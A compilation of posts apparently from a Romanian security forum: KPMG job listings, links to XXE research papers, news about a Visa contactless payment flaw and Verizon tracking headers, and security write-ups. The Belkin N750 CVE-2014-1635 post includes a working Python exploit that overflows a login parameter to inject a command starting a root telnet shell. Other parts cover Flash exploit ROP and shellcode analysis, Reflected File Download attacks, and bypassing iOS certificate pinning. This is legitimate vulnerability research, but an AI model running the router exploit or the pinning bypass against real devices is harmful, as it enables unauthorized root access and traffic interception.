Nytro

Firma: KPMG - In echipa cu mine. IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to:Career news & insights | KPMG | RO Who are we? KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90`s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets. What are we looking for? An IT Security Consultant (Penetration Tester/ Ethical Hacker) for our IT Advisory team. Job profile: • Conduct technical security assessments and information security projects which require expertise in one or more of the following areas: Penetration Testing / Ethical Hacking, Vulnerability Assessments and IT Security Audits; • Identify and exploit technical vulnerabilities in clients’ systems, assess business risks of the technical vulnerabilities and communicate to client personnel; • Perform security configuration analysis for various operating systems, especially Windows and Linux / UNIX; • This is a position in the Penetration Testers Team which requires quick learning and working with new technologies, tools and techniques. Some typical projects that you will work on (depending on your expertise) are: • Web application penetration testing: try to find vulnerabilities in web applications (ex. Internet Banking, eCommerce websites, web portals, etc) and report them to the clients. Try to exploit these vulnerabilities in order to prove their business impact. • Internal network penetration testing: simulate a malicious person who already has access to the internal network of the customer (ex. visitor, consultant, etc). Starting only from a simple network port access you will have to gain access to sensitive information from the client's internal network, gain Domain Admin access or reach other flags. • Mobile application penetration testing: try to find vulnerabilities in mobile applications (Android, iOS, Windows phone) and suggest corrective measures in order to improve their security. • Other types of technical projects that will involve your imagination and out-of-the-box thinking may also occur. • It is sometimes required to make demonstrations and presentations to clients. • We encourage technical research and presenting our results to hacking conferences - local and international. Specific requirements: • Since IT Security is a multidisciplinary field, we are looking for a person who has a broader understanding of technical concepts from one or more of the following areas: web applications, system administration, networking, software development. • In order to understand the technical level that we need, here are a few terms/concepts that we expect you to be familiar with: OWASP Top 10, HTTP protocol, SSL, SQL, JavaScript, buffer overflow, TCP/IP, DNS, wireshark, nmap, Linux shell commands, Kali and others. • You also must be able to express your findings in very good technical and business English (oral and written). • Other desired requirements are: - Bachelor’s degree in an IT related field; - Hands-on experience in at least one of the following: security testing, web application development/testing, system administration, networking, software development; - Work effectively either individually or as a member of a multi-skilled team; - Professional discipline, accuracy, reliability and excellent analytic skills; - Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation. Will be considered a plus Certifications such as: OSCP, OSCE, CEH, LPT, CCNA, MCSE. Nota: Va pot oferi orice fel de informatie (non-confidentiala). PM daca sunteti interesati. Bestjobs: IT Security Consultant la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

Firma: KPMG Romania (unde lucrez si eu) IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to:Career news & insights | KPMG | RO Who are we? KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90`s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets. What are we looking for? An Application Developer for our IT Advisory team. The job's daily activities include design, development, maintenance and integration of business applications. C# will be the usual programming language, Visual Studio - the development environment and Microsoft SQL Server - the data storage engine. Responsibilities: • Building new systems with ASP.MVC , ASP.NET , SQL Server 2008/ 2012 , Entity Framework and Linq; • Developing new functionality on our existing software products; • Leading/mentoring IT staff and sharing knowledge through knowledge-sharing presentations; • Participating in a small, experienced, energetic development team. Requirements: • Solid knowledge of C# and .NET Framework, OOP concepts, algorithms and data structures – minimum 4 years of experience; • Web development experience (ASP.MVC ,ASP.NET, Java script, AJAX, CSS, JSON, JQUERY) - minimum 4 years of experience; • Very good knowledge of T-SQL and relational database design - minimum 4 years of experience; • Graduate of Computer Science/Cybernetics/Information Technology/Electronics College; • Fluent in English; • Ability and willingness to work as part of a team of developers; • Learning oriented person. Additional advantage: • Active Reports, SQL Reporting Services; • Java & Install Shield knowledge; • Active Directory knowledge; • Knowledge of WCF Web Services, WCF Data Services. Nota: Va pot oferi mai multe informatii. PM daca sunteti interesati. Bestjobs: Application Developer la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

Firma: KPMG Romania (unde lucrez si eu) IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to:Career news & insights | KPMG | RO Who are we? KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90`s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets. What are we looking for? A team member for our IT Department. Someone with good inter-personal skills who is able to communicate easy with KPMG staff, based on his proficiency in English. The candidate should be a strong team player and possess a very good time management and task follow-up skills. Moreover, should demonstrate rigor in his daily routine while treating all staff requirements with solicitude. Job objective The overall job objective is to create an interface between the IT Department and end users in order to increase the responsiveness of the IT team to daily and ordinary assistance demands coming from staff. Provide support to staff on all company supported applications. Troubleshoot computer problems and determine source, and advice on appropriate action. Responsibilities: • Respond to requests for technical assistance in person, via phone, and email; • To assist end-users in all IT applications and equipment related issues; • Diagnose, resolve, document resolutions for future reference technical hardware and software issues; • Determine source of computer problems (hardware, software, user access, etc.) and advise staff on appropriate action; • Serve as liaison between staff and the IT department to resolve issues; • Perform hardware and software installations; • Follow standard help desk & incident management procedures: log all help desk interactions, redirect problems to appropriate resource, identify and escalate situations requiring urgent attention, track and route problems and requests and document resolutions, prepare activity reports, stay current with system information, changes and updates; • To ensure, as part of the IT team, the proper operation of all IT and Telecommunication items /equipment; • To take part in the implementation of new IT applications and/or management information systems; • To contribute to the development, improvement and implementation of new IT policies within the Firm and to monitor staff compliance; • To provide full end-user support in using customized specific IT applications; • To deliver on the spot and / or regular IT assistance to staff. Required skills: • University degree in Information Technology or related sciences; • At least 2 years prior work experience as a member of a IT team; • Relevant work experience in hardware, software & communication troubleshooting; • Knowledge of Windows 7/8, Office Application - Microsoft certification desirable; Performance standard requirements: Core Competencies defined for Infrastructure staff (link) Nota: Va pot oferi mai multe informatii. PM cine e interesat. Bestjobs: IT Service Desk la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

Firma: KPMG Romania (unde lucrez si eu) Candidate profile: Participate to IT advisory projects together with other team members; Assist the in-charge and the manager during the fieldwork and project documentation; Perform various project related tasks in accordance with the instructions of the in-charge and the manager; Document the information in dedicated working papers as per KPMG methodology; Assume indicated roles in projects according to your position; Liaise with the clients to understand, obtain and assess specific information. Specific requirements: Bachelor degree in Economics, Information Systems Management, Cybernetics, Information Technology or related; Information Technology knowledgeable and passionate; Ability to communicate accurately and efficiently in English, both verbally and in writing; Flexible in working independently or in a team, as required by tasks assigned; Ability to understand and meet deadlines and to perform work under pressure; Previous experience in a consulting company would be a plus; Available for business travel; Drive for developing professionally and building long term relationships with clients and colleagues. Nota: Va pot oferi mai multe informatii. PM daca e cineva interesat. Bestjobs: IT ADVISORY JUNIOR/ INTERN la S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs

XML Schema, DTD, and Entity Attacks May 19, 2014 Version 1.0 Timothy D. Morgan (@ecbftw) Omar Al Ibrahim (oalibrahim@vsecurity.com) Contents Abstract...............................................................................................................................................................................3 Introduction........................................................................................................................................................................4 Motivation............................................................................................................................................................................................................. 4 Background........................................................................................................................................................................................................... 4 Prior Art................................................................................................................................................................................................................ 5 General Techniques...........................................................................................................................................................6 Resource Inclusion via External Entities........................................................................................................................................................ 6 URL Invocation.................................................................................................................................................................................................... 7 Parameter Entities.............................................................................................................................................................................................. 9 External Resource Inclusion via XInclude Support................................................................................................................................... 12 Denial of Service Attacks................................................................................................................................................................................ 13 Implementation-Specific Techniques and Limitations.............................................................................................15 Java / Xerces...................................................................................................................................................................................................... 15 C# / .NET........................................................................................................................................................................................................... 19 Expat.................................................................................................................................................................................................................... 24 Libxml2................................................................................................................................................................................................................ 25 PHP...................................................................................................................................................................................................................... 26 Python................................................................................................................................................................................................................. 28 Ruby..................................................................................................................................................................................................................... 28 Recommendations For Developers............................................................................................................................29 Java / Xerces...................................................................................................................................................................................................... 29 C# / .NET........................................................................................................................................................................................................... 30 Expat.................................................................................................................................................................................................................... 32 Libxml2................................................................................................................................................................................................................ 32 PHP...................................................................................................................................................................................................................... 32 Python................................................................................................................................................................................................................. 32 Ruby..................................................................................................................................................................................................................... 33 Recommendations For XML Library Implementors..............................................................................................33 Future Work.....................................................................................................................................................................34 Acknowledgements........................................................................................................................................................34 References........................................................................................................................................................................35 Download:http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

CONTENT Introduction It's all about entities Parameter entities Validity and well-formedness XXE Data Retrieval Peculiar features of attacks on various parsers References About Positive Technologies Download: https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf

How To Steal $999,999.99 From Visa Contactless Cards Without PIN. Posted on November 6, 2014 by Waqas Findings from the newly submitted research paper at Newcastle University will shock many of the people using VISA contactless payment system. Amazing aspect of the research is that it doesn’t involve any kind of hack, it’s just a trick that can force contactless payment owners to pay much more than they were willing to spend. Such an attack is a special type of Man in the Middle (MitM) attack. So, fasten your seat belts and get ready because something quite astonishing is about to be unraveled! Let’s first look at how contactless bank payment system work. Contactless bank payment (relies on near field communication technology) allows it’s users to pay on the wavier of the card at the payment terminal (card must be within 5cm of the terminal to work). The system is widely used at a number of places (London’s Oyster and Sydney’s Opal are the examples) to charge the users instantaneously. When a user waivers the card through electromagnetic field, an antenna inside the card produces a small current and this wakes up the chip inside the card which reads the data, makes the calculations and provides the reply. Now you must be wondering what’s wrong with the system. Really, there is a massive loop hole in the system let me unravel it. Consider a rigged payment terminal put into place and it detects your card for payment. Though, for only small transactions (less than $20) no pin is required but serious cash can be made if machine can trick through large number of cards each day. It’s like a magnetic field that is always looking to attract different types of materials. Researchers when researched deep into this problem, they found number of concerns over the usage of cards and the related policies: 1. When using VISA cards for foreign payments, the restriction of entering PIN for payments over 20 pounds is omitted. 2. When paying in foreign currency, the official restriction in term of local currency for the payment is omitted. And the card can be charged amount as large as 8-figures. So, if you are in UK your card can be charged up to US$999,999.99 (Not a bad deal for an ordinary thieve J) 3. When paying offline over 100 pounds in foreign currency, security for the payment is reduced and the card is made committed for the transaction without even involving the bank. Though, researchers are not yet sure if transactions exceeding the available balance are allowed or not but once the transaction is made offline the thieve can easily create fake document to claim money or show the money belongs to him and the real owner only gets updates once the transaction is processed. Another concern that is not related to the usage of cards but the terminals: 1 Terminals can even work as spying tool, as many people use these NFC terminals to have the information to their smartphones offline and if rigged these terminal can easily gather information from the people’s smartphones. So, what should be done to stop this from becoming a reality? Well, the researchers have listed some important tips for the contactless payment system and the developers. Tip for the developers: 1. Always require a PIN for foreign currencies. 2. Always require online transaction verification for foreign currencies. Tips for Technology users: 1 If you don’t travel overseas regularly, ask your bank if it offers an option to prevent transactions in foreign currencies. 2. Keep your card in a wallet or cover that blocks electromagnetic radiation so it has to be taken out to be used. 3. Do your low value payments with cash, so you don’t need contactless transactions enabled on your card at all. Sursa: http://hackread.com/how-to-steal-million-from-visa-contactless-cards/

EFF: VPNs will crumble Verizon's creepy supercookie stalkers Now that ad networks are jumping on the privacy vulnerability By Iain Thomson, 6 Nov 2014 The Electronic Frontier Foundation says Verizon's silent supercookies, which always follow subscribers around the internet, are being abused by creepy advertisers to push targeted ads. The EFF says people should start using encrypted VPNs by default to claw back their privacy, because opting out of the system is not enough. Two years ago Verizon started stamping a unique identifier token header (UIDH) on each website visit made by subscribers via its cellular data network. As the name suggests, the identifiers are unique to each person, allowing website owners to quietly build up profiles on people using these ID codes. These records of online behavior are valuable to advertisers, as it allows them to get an idea of which adverts to display to each person: someone tracked across cycling websites will end up being shown ads for new bikes, for example. Verizon allows people to "opt-out" of the system, meaning the telco won't allow advertisers to directly request and analyze your online wanderings, but the setting is mostly useless: every single HTTP request via its network is stamped with a UIDH regardless of the opt-out, and is thus visible to any web server one visits. Now it appears that ad networks are using the UIDHs to monitor internet users without all that tiresome business of actually paying Verizon for the privilege, and since the system is baked in by the company there's very little people can do to stop them. Code has already appeared on Github (since removed) that would allow anyone with the right setup to track Verizon's identifier, and reports are surfacing that Twitter has also managed to find out a way to follow the telco's clients online using the UIDH information. The UIDH system is also pernicious in that it bypasses the anti-tracking measures in iOS and Android that are designed to protect mobile users' privacy: these measures tackle web cookies, rather than the specific UIDH HTTP header. "It is possible to build an opt-out system that would stop this, but it would take a considerable amount of work and the current systems just can't do it," EFF staff technologist Jacob Hoffman-Andrews told The Register. Stamping on a mandatory ID number on subscribers is such a nice idea that AT&T is also reportedly considering the same "feature" for its customers. The only way to block the use of the UIDH system is to use a VPN and/or Tor for your online browsing. Tor is usually your go-to software for privacy but it can be difficult to set up on a mobile, but almost all smartphones have a VPN mode baked in and Hoffman-Andrews recommended users activate it to maintain online anonymity. "The only way, in the short term, to stop this is if enough people complain about it," Hoffman-Andrews said. "Longer term, once we get encryption across the whole internet, this kind of thing will be less of an issue. But that's 10 or 20 years away at least." ® Sursa: EFF: VPNs will crumble Verizon's creepy supercookie stalkers • The Register

[h=1]From 0-day to exploit – Buffer overflow in Belkin N750 (CVE-2014-1635)[/h] Vulnerability Summary A vulnerability in the guest network web interface of the Belkin N750 DB Wi-Fi Dual-Band N+ Gigabit Router with firmware F9K1103_WW_1.10.16m, allows an unauthenticated remote attacker to gain root access to the operating system of the affected device. The guest network functionality is default functionality and is delivered over an unprotected wifi network. Successful exploitation of the vulnerability enables the attacker to gain full control of the affected router. Vulnerability Discovery Fuzzing plays an important role in vulnerability discovery and this time was not different. After some fuzzed requests I noticed that the POST parameter “jump” suffered from a classic buffer overflow with a payload containing 5000 bytes. After the referred buffer overflow the process died. This behavior was consistent with a traditional buffer overflow and the question that popped in my mind was if this was exploitable. To try to clear this out I considered two possible approaches to be able to analyze the vulnerable process: Virtualization of the router process – would enable the debugging of the mips32 process in an x86 machine but probably needed some binary patching or function injection to bypass hardware or configuration access limitations on QEMU. Patching the router firmware – Would enable to open a backdoor and to put debugging tools inside the router with some risk of bricking the router in the process. In the first stage of the investigation I decided that virtualization of the affected process was the simplest and less risky approach to investigate the exploitability of this vulnerability. To get this done I downloaded the firmware to identify the process responsible for the crash. After binwalking the firmware and finding a linux mips32 system, both virtualization and patching approaches seemed viable since all files were extracted without problems. Binwalk extracted the squashfs filesystem from the image, and in few minutes the router filesystem was available to further analysis. By analyzing the strings in the http and minhttp binaries, it was possible to discover that the webserver available in the guest wifi network where the buffer overflow occurred was in fact minhttp. The Virtualization As stated above, to better analyse this vulnerability I decided to virtualize the minhttp process. For that I used qemu-mipsel-static since there is a lot of info about the subject and I had previous successful experiences with it. At first try qemu-mipsel-static refused to execute the minhttp deamon: The error “Can’t bind to any address” in this context means that the process is trying to bind to an IP address that does not exist on the system. A grep on the binary immediately discloses the IP address where the process was trying to bind. With the correct IP address on the interface, qemu is finally able to run the process, but after trying to access the contents of the site strace shows us that the CWD is wrong and that the process running with a wrong current working directory is not able to get and present the html files. This happens because the execution of the qemu must be done on a chroot of the firmware, which means that the execution of the binary will have the root of the file system of the firmware as CWD and not the /www as expected by minhttpd. To solve this issue I remembered of two possible approaches and both worked. The first was to use LD_PRELOAD to load a custom library hooking a used function in minhttpd and that function executes the Change Directory. The second was to use the binfmt module to execute in a seamless manner the mips32 binary and instead of executing the minhttpd directly from qemu I executed the mips32 /bin/sh inside the chroot of the firmware and then changed the CWD to the correct place before executing the minhttpd binary using the mips32 /bin/sh. To configure the binfmt I used the following signature: echo ‘:mipsel:M::\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00:\xff\xff\xff \xff\xff\xff\xff\x00\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xff\xff\xff:/usr/bin/qemu-mipsel-static:’ > /proc/sys/fs/binfmt_misc/register The following image shows the execution of the mips32 process on an x86 system using binfmt: After all the tweaks necessary to put the process running I activated the instruction tracing in QEMU (-d in_asm,cpu) and confirmed the exploitability: Ok now, I had confirmation that this vulnerability could be exploited with a payload with mips32 machine code. While trying to identify the correct amount of bytes I used incremental buffers and noticed that the minhttp process had different behaviors with different payload sizes: Bellow ±1300 bytes the request was correctly handled Above ±1300 and below ±2000 the minhttp process returned an empty http response Above ±2000 bytes the minhttp process crashed It seemed that a buffer size between ±1300 and ±2000 crashed something, but was not enough to crash the process. This strange behavior needed a deeper analysis and quickly after stracing the process I had confirmation that this vulnerability was much more than a simple buffer overflow with remote machine code execution. The strace below shows that buffers bigger than ±1300 bytes trigger some kind of execution using /bin/sh. With a payload that is big enough, it is possible to execute the string on the request as we can see on the underlined execve(). But how to take advantage of this backdoor-like vulnerability? The Disassembler came in my help. Reverse Engineering for the root cause Using the IDAPro disassembler I was able to identify the problem, the overflow occurred due to the usage of the insecure strcpy() function. The vulnerability exists due to improper buffer handling using the strcpy() function in the address 0×00402570 as presented in the image below: The source buffer processed by strcpy() comes from POST parameter “jump” and is returned by the get_cgi() function in 0×00402550. The buffer overflow enables the control of a variable named do_xread located in the heap and that is used to decide the execution of CGIs. The decision point occurs at address 0x0040338C where the $v1 register that has the value of the overwritten do_xread is compared with zero. The CGI execution is done using the popen() function as we can see in address 0x004033D0. The popen() function opens a process by creating a pipe, forking, and invoking the shell, so the argument to popen() is supposed to be a pointer to a null-terminated string containing a shell command line that will be passed to /bin/sh using the -c flag. The name of the CGI to be executed is also in the heap and somewhere between 0x004476D0 and 0x00447AD0 near do_xread. So since the two variables are conveniently near each other it is possible with only one oversized payload processed by strcpy() to overwrite the do_xread(the control variable) and the byte_4476D0 (variable with the name of the CGI to be executed). As described before, the name of the CGI is processed with popen() so, instead of a file name we can inject several commands at once, separated for instance by semi-colon. This vulnerability enables control over a part of heap memory where a variable that forces the execution of a CGI and also the variable with the name of the CGI to be executed are stored. In conclusion, the requirements for injecting commands are fulfilled. Vulnerability Exploitation An attacker could exploit this vulnerability by preparing a special POST where the parameter “jump” takes some padding (1379 bytes) concatenated with the commands to be executed and with something different from zero to overwrite the do_xread and enter the section of code that invokes the popen() by failing the jump BEQZ at address 0x0040338C. The image below shows the execution of the utelnetd using this exploit. Exploit Code The following Python code to exploit this vulnerability enables the execution of commands in the router, in this case the telnet service is started and by default the login program is /bin/sh so… with no login prompt. #!/usr/bin/python #Title : Belkin n750 buffer overflow in jump login parameter #Date : 28 Jan 2014 #Author : Discovered and developed by Marco Vaz <mv@integrity.pt> #Testd on: Firmware: 1.10.16m (2012/9/14 6:6:56) / Hardware : F9K1103 v1 (01C) import httplib headers = {} body= “GO=&jump=”+ “a”*1379 +”%3b”+ “/usr/sbin/utelnetd -d” +”%3b&pws=\n\n” conn = httplib.HTTPConnection(“192.168.169.1?,8080) conn.request(“POST”, “/login.cgi”, body, headers) response = conn.getresponse() data = response.read() print data I have developed a Metasploit module to exploit this vulnerability that also executes iptables commands so that it is possible to access telnet server directly from the guest network to the root shell. You can get it here: belkin_rce_cve-2014-1635.rb. Written by Marco Vaz Sursa: https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/

Cracking the CVE-2014-0569 nutshell msft-mmpc 5 Nov 2014 5:00 PM ?The Microsoft Malware Protection Center (MMPC) has recently seen an exploit targeting the Adobe Flash Player vulnerability CVE-2014-0569. This exploit is being integrated into the Fiesta exploit kit. The vulnerability related to this malware was addressed with a patch released by Adobe on 14 October 2014. Adobe Flash Player desktop runtime for Windows versions 15.0.0.167 and earlier are vulnerable. If you're using a vulnerable Adobe Flash Player version you should update now to help protect your PC. We analyzed how these attacks work and found the following details. The exploit successfully bypasses the validation of memory range and is able to access an arbitrary location. It attempts to corrupt the VTABLE entry for the virtual function toString( ) of sound object. Later, the ActionScript calls the Sound.toString() method and control is transferred to the controlled address, as shown in Figure 1. Figure 1: Transfer control via a corrupted VTABLE Sound.toString() At the controlled address, it starts the ROP gadgets built from the Flash Player DLL, as shown in Figure 2. Figure 2: Control transferred to ROP gadgets These ROP gadgets are a bit convoluted, but they can be summarized in following steps: The gadgets prepare the data on the stack using a loop of the following gadgets: dec eax // decrement the address to build code ret pop ecx // store the code bytes in ECX ret mov dword ptr [eax],ecx // store the code to the address specified by EAX pop ebp ret The control is passed to (via a ret instruction) API VirtualAlloc() to allocate a 0x1000 byte buffer. It uses gadget: mov dword ptr [eax],ecx // store the code pop ebp ret to build some new gadgets at the start of the allocated buffer, for example: mov dword ptr [eax+0Ch],ecx ret These new gadgets build up a small piece of two-layer decryption code to decrypt the shellcode: Control is passed over to the fully decrypted shellcode. The shellcode downloads a file from the remote server and executes it. The downloaded file is detected as TrojanDropper:Win32/Ropest.A. As well as keeping your software up-to-date, we also recommend running a real-time security product such as Microsoft Security Essentials to help protect your PC from this and other threats. Chun Feng MMPC Sha1: 468f23ef2f6318ea59a3cbc5570ac766435a5315 (detected as Exploit:SWF/Fiexp.B) 61a776fda7d50655ea336b22499573250fa8761d (detected as TrojanDropper:Win32/Ropest.A) Sursa: Cracking the CVE-2014-0569 nutshell - Microsoft Malware Protection Center - Site Home - TechNet Blogs

Reflected File Download - A New Web Attack Vector PLEASE NOTE: As promised, I've published a full white paper that is now available for download: White paper "Reflected File Download: A New Web Attack Vector" by Oren Hafif. On October 2014 as part of my talk at the Black Hat Europe 2014 event, I presented a new web attack vector that enables attackers to gain complete control over a victim’s machine by virtually downloading a file from trusted domains. I decided to call this technique Reflected File Download (RFD), as malware can be "downloaded" from highly trusted domains such as Google.com and Bing.com without ever being uploaded. As long as RFD is out there, users should be extremely careful when downloading and executing files from the web. The download link might look perfecty fine and include a popular, trusted domain and use a secure connection, but users still need to be wary. Look at the following link for example. Up until a few months ago, it could have been used to steal ALL cookies from your browser, perform actions on your behalf and steal emails from your Gmail inbox: https://www.google.com/s;/ChromeSetup.bat Google fixed the vulnerability so that the link above now only downloads a harmless text file. RFD, like many other Web attacks, begins by sending a malicious link to a victim. But unlike other attacks, RFD ends outside of the browser context: 1) The user follows a malicious link to a trusted web site. 2) An executable file is downloaded and saved on the user’s machine. All security indicators show that the file was “hosted” on the trusted web site. 3) The user executes the file which contains shell commands that gain complete control over the computer. Figure 1 – The three steps attack flow of reflected file download For a Reflected File Download attack to be successful, there are three simple requirements: 1) Reflected – Some user input is being “reflected” to the response content. This is used to inject shell commands. 2) Filename – The URL of the vulnerable site or API is permissive and accepts additional input. This is often the case and is used by attackers to set the extension of the file to an executable extension. 3) Download – The response is being downloaded and a file is created “on-the-fly” by the Web browser. The browser then sets the attacker-controlled filename that was parsed in requirement 2 above. Figure 2 – A service is vulnerable if the three RFD requirements are met Articol complet si video: Reflected File Download - A New Web Attack Vector - SpiderLabs Anterior

Intercepting the App Store's Traffic on iOS TL;DR: By default, MobileSubstrate tweaks do not get injected into system daemons on iOS which explains why my SSL Kill Switch tool wasn’t able to disable SSL certificate validation in the iTunes App Store. The problem Last year I released the iOS SSL Kill Switch, a tool designed to help penetration testers decrypt and intercept an application’s network traffic, by disabling the system’s default SSL certificate validation as well as any kind of custom certificate validation (such as certificate pinning ). While the tool worked well on most applications including SSL-pinning apps such as Twitter or Square, users reported that it didn’t work the iTunes App Store, which would still refuse to connect to an intercepting proxy impersonating the iTunes servers. Other similar tools such as Intrepidus Group’s trustme also seemed to have the same limitation. A quick look at the App Store on iOS The first step was to get the right setup: An intercepting proxy (Burp Pro) running on my laptop. An iPad with the SSL Kill Switch installed, and configured to use my laptop as the device’s proxy. After starting the App Store app, I noticed that I could already intercept and decrypt specific SSL connections initiated by the App Store: all the HTTP requests to query iTunes for available apps (as part of the App Store’s tabs such as Featured'',Top Charts’’, etc.) as well as app descriptions (Details'', Reviews’’). However, more sensitive operations including user login or app installation and purchase would fail by rejecting my intercepting proxy’s invalid SSL certificate. From looking at logs on the device, it turns out that two distinct processes are behind the App Store’s functionality: AppStore[339] <Warning>: JS: its.sf6.Bootstrap.init: Initialize itunesstored[162] <Error>: Aug 22 11:29:10 SecTrustEvaluate [root AnchorTrusted] AppStore is the actual App Store iOS application that you can launch from the Springboard. It is responsible for displaying the App Store UI to the user. itunesstored is a daemon launched at boot time by launchd, the process responsible for booting the system and managing services/daemons. tunesstored seems to be responsible for the more sensitive operations within the App Store (login, app purchase, etc.) and possibly some of the DRM/Fairplay functionality. Why SSL Kill Switch didn’t work I initially thought the issue to be that the strategy used by the SSL Kill Switch to disable certificate validation somehow wasn’t enough to bypass itunesstored’s certificate pinning. However, it turns out that the SSL Kill Switch was just not being injected into the itunesstored process at all, for a couple reasons: The itunesstored process is started as a daemon by launchd early during the device’s boot sequence, before MobileSubstrate and MobileLoader get started. Therefore, none of the MobileSubstrate tweaks installed on the device, including the SSL Kill Switch, get injected into this process. The SSL Kill Switch had a MobileLoader filter so that the code disabling certificate validation would only be loaded into apps linking the UIKit bundle (ie. applications with a user interface). This was initially done to restrict the effect of the SSL Kill Switch to App Store apps only. However, itunesstored is a daemon that doesn’t have a user interface, hence the filter prevented MobileLoader from injecting the SSL Kill Switch into the process. Man-in-the-Middle on itunesstored After figuring this out, getting itunesstored to stop validating SSL certificates was very straightforward. First of all, make sure you’re using the latest version of the SSL Kill Switch (at least v0.5). Then, all you need to do is kill the itunesstored process: iPad-Mini:~ root# ps -ef | grep itunesstored 501 170 1 0 0:00.00 ?? 0:01.95 /System/Library/PrivateFrameworks/iTunesStore.framework/Support/itunesstored 0 432 404 0 0:00.00 ttys000 0:00.01 grep itunesstored iPad-Mini:~ root# kill -s KILL 170 When doing so, launchd will automatically restart itunesstored. This time however, MobileLoader will inject the SSL Kill Switch’s code into the process. You can validate this by looking at the device’s logs, for example using the xCode console. You should see something like this: itunesstored[1045] <Notice>: MS:Notice: Loading: /Library/MobileSubstrate/DynamicLibraries/SSLKillSwitch.dylib itunesstored[1045] <Warning>: SSL Kill Switch - Hook Enabled. If you restart the App Store app, you should then be able to proxy all the traffic and see app store transactions such as logins or app downloads. If you try to install an app while proxying, your proxy might crash or freeze when the App Store tries to download the app because IPA files can be fairly large (200+ MB). Takeaway A similar methodology could be used to proxy other system daemons including for example accountsd, which is responsible for the Twitter and Facebook integration that was added to iOS 5 and iOS 6. While working on this, I also discovered a better way to disable SSL certificate validation and certificate pinning in iOS apps. Hence, SSL Kill Switch v0.5 is actually a complete rewrite. If you’re interested in knowing how it works, I wrote a blog post explaining what the tool does. Sursa: https://nabla-c0d3.github.io/blog/2013/08/20/intercepting-the-app-stores-traffic-on-ios/

iOS Application Security Part 36 – Bypassing certificate pinning using SSL Kill switch - Prateek Gianchandani In this article, we will look at how we can analyze network traffic for applications that use certificate pinning. One of the best definitions i found of certificate pinning is mentioned below. It is taken directly from this url. By default, when making an SSL connection, the client checks that the server’s certificate: has a verifiable chain of trust back to a trusted (root) certificate matches the requested hostname What it doesn’t do is check if the certificate in question is a specific certificate, namely the one you know your server is using. Relying on matching certificates between the device’s trust store and the remote server opens up a security hole. The device’s trust store can easily be compromised – the user can install unsafe certificates, thus allowing potential man-in-the-middle attacks. Certificate pinning is the solution to this problem. It means hard-coding the certificate known to be used by the server in the mobile application. The app can then ignore the device’s trust store and rely on its own, and allow only SSL connections to hosts signed with certificates stored inside the application. This also gives a possibility of trusting a host with a self-signed certificate without the need to install additional certificates on the device. Certificate pinning is used by many popular applications for e.g Twitter, Square etc. So the question that arises is, how do you bypass this certificate validation that is happening on the client side ? The important thing to note here is all that all the validation is happening on the client side. And since there are frameworks like Mobile Substrate that allow us to patch any method during runtime and modify its implementation, it is possible to disable the certificate validation that is happening in the application. A POC tool for this by released in Blackhat and it was named iOS SSL Kill Switch. The full presentation can be found here. After some time, the author realized that he was able to inspect traffic from apps that used certificate pinning (for e.g Twitter), but he wasn’t able to see the traffic going through the App Store app. He then realized he needed to patch even more low level methods and kill specific processes in order to inspect traffic going via the App store app. The full writeup for this could be found here and it’s quite interesting, so i suggest you give it a read. Also note that this tool will also be able to disable the default SSL certificate validation, so you don’t need to install a certificate as trusted root as well, which is what we usually do for inspeting traffic over HTTPs. To really check that the Twitter app uses certificate pinning, install the Twitter app and route the device traffic through Burp Proxy. Make sure you are inspect traffic via HTTP/HTTPS using the steps mentioned in Part 11 of this series. However, when you open the twitter app and navigate around, the traffic is not captured by Burpsuite. To inspect the traffic going via Twitter, ssh into your device and download the iOS SSL Kill Switch package from it’s releases link. Also, make sure to install the following packages via Cydia. dpkg MobileSubstrate PreferenceLoader Now install the deb package using the command dpkg -i . Now, respring the device using the command killall -HUP SpringBoard. Once this is done, go to Settings app. There will be a new menu for SSK Kill Switch and a slider to Disable certificate validation. Make sure the slider is set to on. Now route the traffic in the device to pass through Burp Proxy. Open twitter app and now you can see all the data going through via the twitter app as well. To verify that SSL Kill Switch is being injected into the application, go to Xcode -> Devices (I am using Xcode 6), look for your device in the left menu and click on the arrow pointing up in the lower left corner to see the device logs. You will see that SSL Kill Switch is being injected into the application. Another cool utility that does the same job is trustme. I recommend you check it out. Sursa: iOS Application Security Part 36 – Bypassing certificate pinning using SSL Kill switch - Prateek Gianchandani

